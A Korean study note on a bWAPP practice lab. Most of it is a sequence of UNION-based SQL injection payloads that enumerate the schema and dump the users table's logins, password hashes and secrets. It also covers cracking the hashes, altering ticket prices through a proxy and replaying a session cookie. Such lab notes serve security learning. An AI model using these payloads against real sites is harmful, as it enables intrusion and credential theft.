알면 좋은 것

실습

1) SELECT ??? FROM ??? WHERE movie= ' '; 예상문

• ' UNION SELECT 1,2,3,4,5,6,7 # 또는 1' order by 1 #
  • 유니온을 사용할 때에는 SELECT 문에 있는 컬럼과 숫자가 같아야하지만 현재는 몇개가 있는지 모른다. 그렇기에 숫자 하나하나 넣어보면서 몇개가 있는지 추측할 수 있다.
    
  • 출력문을 봤을 떄 2354에 원하는 넣어야함

2) 11' UNION SELECT 1,database(),version(),4,user(),6,7

• database() : 데이터베이스 이름을 확인하는 함수 : bWAPP
• version() : 버전을 확인하는 함수 : 5.0.96-0ubuntu3
• user() : 사용자를 확인하는 함수 : root@localhost

3) 1' UNION SELECT 1,database(),version(),table_name,user(),6,7 FROM information_schema.tables#

4) 1' UNION SELECT 1,database(),version(),table_name,user(),6,7 FROM information_schema.tables WHERE table_schema = 'bWAPP'#

 ![](https://velog.velcdn.com/images/tmslflzk/post/1f2204eb-0107-481c-9ac1-b089daa7990c/image.png)

5) 1' UNION SELECT 1,table_name,,4,user(),6,7 FROM information_schema.tables WHERE table_schema = 'bWAPP'#

6) 1' UNION SELECT 1,column_name,3,4,5,6,7 FROM information_schema.columns WHERE table_schema = 'bWAPP'#

7) 1' UNION SELECT 1,column_name,3,4,5,6,7 FROM information_schema.columns WHERE table_schema = 'bWAPP'and table_name = 'users'#

8) 1' UNION SELECT 1,id,login,password,secret,6,7 FROM users#

id, login, password, seceret의 내용 보기

https://hashes.com/en/decrypt/hash
https://crackstation.net/ 해쉬값을 계산해줄 수 있음

9) 개발자 환경과 프록시를 이용하여 일정값 바꾸기

• 프록시를 활용하여 ticket_quantity와 ticket_prince의 값을 변경

• 15유로였지만 1유로로 바뀌어 200,000,000장을 사도 200,000,000유로인것을 볼수 있음

10) 쿠기 재활용

• 쿠키에디터를 활용하여 PHPSESSID 값을 저장

• 쿠키에디터를 기존데이터를 바꾼 후 로그아웃

• 쿠키에디터로 저장해두었던 값을 다시 저장 후 상위 주소로 이동

• 다시 로그인된 것을 확인할 수 있음